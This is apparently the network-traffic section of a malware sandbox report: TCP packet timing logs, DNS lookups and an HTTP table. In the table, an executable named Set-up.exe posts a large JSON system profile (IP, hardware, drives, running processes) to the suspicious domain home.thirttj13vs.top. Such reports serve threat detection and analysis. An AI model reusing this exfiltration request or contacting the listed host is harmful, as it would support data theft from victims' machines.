                              Jan 6, 2025 12:15:02.404771090 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404820919 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404829979 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404846907 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404855013 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404891014 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404906034 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.404942036 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.404953957 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404963017 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404966116 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404970884 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.404979944 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405015945 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405020952 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405025959 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405035973 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405049086 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405057907 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405071974 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405083895 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405102015 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405107021 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405112028 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405153036 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405251026 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405261040 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405268908 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405277014 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405286074 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405294895 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405303001 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405303955 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405319929 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405338049 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405340910 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405349016 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405354977 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405371904 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405395031 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405397892 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405407906 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405448914 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405457973 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405467033 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405478001 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405486107 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405493975 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405502081 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405507088 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405518055 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405527115 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405534983 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405559063 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.405633926 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405643940 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405652046 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405659914 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405669928 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405678034 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405714035 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405723095 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405754089 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405761957 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405814886 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405823946 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405833006 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.405847073 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.409750938 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.409858942 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.409868002 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.409912109 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.409924984 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.409934998 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.409970045 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.409977913 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.409979105 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410018921 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410018921 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410028934 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410036087 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410058022 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410058975 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410083055 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410098076 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410101891 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410146952 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410160065 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410170078 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410207987 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410223961 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410228968 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410238028 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410280943 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410285950 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410296917 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410339117 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410342932 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410347939 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410363913 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410372019 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410387993 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410394907 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410404921 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410412073 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410442114 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410449982 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410451889 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410481930 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410490036 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410490990 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410506964 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410515070 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410537004 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410542965 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410545111 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410567045 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410572052 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410583019 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410593033 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410624027 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410626888 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.410634995 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410650969 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410659075 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410691023 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410700083 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410728931 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410737991 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410767078 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410774946 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410819054 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410829067 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410845041 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410852909 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410862923 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410871029 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410921097 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410929918 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410938978 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.410947084 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.414828062 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.414839029 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.414868116 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.414876938 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.414894104 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.414902925 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415007114 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415014982 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415025949 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.415080070 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.415107965 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415117979 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415146112 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415154934 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415158033 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.415195942 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415201902 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.415205956 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415227890 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415235996 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415246010 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.415277004 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.415307999 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415323973 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415338039 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415347099 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415361881 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.415371895 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.415388107 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415396929 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415397882 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.415419102 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415427923 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415462017 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415471077 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415508986 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415517092 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415540934 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415549994 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415584087 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415592909 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415606976 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415615082 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415652990 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415661097 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415702105 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415710926 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415725946 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415734053 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415745974 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415774107 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415782928 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415790081 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415826082 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415833950 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415862083 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415869951 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415894032 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415901899 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415962934 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415971994 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.415993929 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.419950962 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.419960022 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420018911 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420036077 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420165062 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420173883 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420217037 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420224905 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420259953 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420269012 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420304060 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420311928 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420326948 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420335054 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420356035 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420363903 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420408964 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420418024 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420454979 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420463085 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420531034 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420538902 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420547962 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420559883 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420588017 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420597076 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420649052 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420656919 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420670986 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420680046 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420701981 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420737028 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420792103 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420802116 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420811892 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420819998 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420855999 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420864105 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420881033 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420888901 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420943975 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420952082 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420968056 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.420977116 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:05.263189077 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:05.263488054 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:05.271806002 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:05.271855116 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:05.306493044 CET4973253192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:05.315579891 CET53497321.1.1.1192.168.2.4
                              Jan 6, 2025 12:15:05.315655947 CET4973253192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:05.315788984 CET4973253192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:05.326122046 CET53497321.1.1.1192.168.2.4
                              Jan 6, 2025 12:15:05.811717987 CET53497321.1.1.1192.168.2.4
                              Jan 6, 2025 12:15:05.815135002 CET4973253192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:05.815336943 CET4973380192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:05.820200920 CET53497321.1.1.1192.168.2.4
                              Jan 6, 2025 12:15:05.820211887 CET804973334.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:05.820245981 CET4973253192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:05.820275068 CET4973380192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:05.822952986 CET4973380192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:05.827763081 CET804973334.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:06.439994097 CET804973334.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:06.440289974 CET4973380192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:06.446578979 CET804973334.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:06.446624994 CET4973380192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:07.262336969 CET4973480192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:07.267193079 CET804973434.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:07.267414093 CET4973480192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:07.267832041 CET4973480192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:07.272583008 CET804973434.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:07.976244926 CET804973434.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:07.976612091 CET4973480192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:07.981856108 CET804973434.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:07.981909990 CET4973480192.168.2.434.147.147.173

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jan 6, 2025 12:14:58.077063084 CET6164953192.168.2.41.1.1.1
                              Jan 6, 2025 12:14:58.077115059 CET6164953192.168.2.41.1.1.1
                              Jan 6, 2025 12:14:58.083869934 CET53616491.1.1.1192.168.2.4
                              Jan 6, 2025 12:14:58.084177017 CET53616491.1.1.1192.168.2.4
                              Jan 6, 2025 12:15:01.056473017 CET6165453192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:01.056580067 CET6165453192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:01.438524008 CET53616541.1.1.1192.168.2.4
                              Jan 6, 2025 12:15:01.922171116 CET53616541.1.1.1192.168.2.4
                              Jan 6, 2025 12:15:05.289653063 CET6165653192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:05.289716005 CET6165653192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:05.299109936 CET53616561.1.1.1192.168.2.4
                              Jan 6, 2025 12:15:05.299128056 CET53616561.1.1.1192.168.2.4
                              Jan 6, 2025 12:15:06.464376926 CET6165853192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:06.464409113 CET6165853192.168.2.41.1.1.1
                              Jan 6, 2025 12:15:07.097193003 CET53616581.1.1.1192.168.2.4
                              Jan 6, 2025 12:15:07.261639118 CET53616581.1.1.1192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jan 6, 2025 12:14:58.077063084 CET192.168.2.41.1.1.10xb359Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                              Jan 6, 2025 12:14:58.077115059 CET192.168.2.41.1.1.10x6c88Standard query (0)httpbin.org28IN (0x0001)false
                              Jan 6, 2025 12:15:01.056473017 CET192.168.2.41.1.1.10xb58dStandard query (0)home.thirttj13vs.topA (IP address)IN (0x0001)false
                              Jan 6, 2025 12:15:01.056580067 CET192.168.2.41.1.1.10xff07Standard query (0)home.thirttj13vs.top28IN (0x0001)false
                              Jan 6, 2025 12:15:05.289653063 CET192.168.2.41.1.1.10xf61eStandard query (0)home.thirttj13vs.topA (IP address)IN (0x0001)false
                              Jan 6, 2025 12:15:05.289716005 CET192.168.2.41.1.1.10x3466Standard query (0)home.thirttj13vs.top28IN (0x0001)false
                              Jan 6, 2025 12:15:05.315788984 CET192.168.2.41.1.1.10x3466Standard query (0)home.thirttj13vs.top28IN (0x0001)false
                              Jan 6, 2025 12:15:06.464376926 CET192.168.2.41.1.1.10x493eStandard query (0)home.thirttj13vs.topA (IP address)IN (0x0001)false
                              Jan 6, 2025 12:15:06.464409113 CET192.168.2.41.1.1.10xed58Standard query (0)home.thirttj13vs.top28IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jan 6, 2025 12:14:58.084177017 CET1.1.1.1192.168.2.40xb359No error (0)httpbin.org50.19.58.113A (IP address)IN (0x0001)false
                              Jan 6, 2025 12:14:58.084177017 CET1.1.1.1192.168.2.40xb359No error (0)httpbin.org3.210.94.60A (IP address)IN (0x0001)false
                              Jan 6, 2025 12:14:58.084177017 CET1.1.1.1192.168.2.40xb359No error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                              Jan 6, 2025 12:14:58.084177017 CET1.1.1.1192.168.2.40xb359No error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                              Jan 6, 2025 12:15:01.438524008 CET1.1.1.1192.168.2.40xb58dNo error (0)home.thirttj13vs.top34.147.147.173A (IP address)IN (0x0001)false
                              Jan 6, 2025 12:15:05.299109936 CET1.1.1.1192.168.2.40xf61eNo error (0)home.thirttj13vs.top34.147.147.173A (IP address)IN (0x0001)false
                              Jan 6, 2025 12:15:07.261639118 CET1.1.1.1192.168.2.40x493eNo error (0)home.thirttj13vs.top34.147.147.173A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • httpbin.org
                              • home.thirttj13vs.top

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.44973134.147.147.173806512C:\Users\user\Desktop\Set-up.exe
                              TimestampBytes transferredDirectionData
                              Jan 6, 2025 12:15:01.929301023 CET12360OUTPOST /gbVspuhpvozlydclqfRi1736138767 HTTP/1.1
                              Host: home.thirttj13vs.top
                              Accept: */*
                              Content-Type: application/json
                              Content-Length: 577840
                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 39 39 30 37 30 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                              Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317990705", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
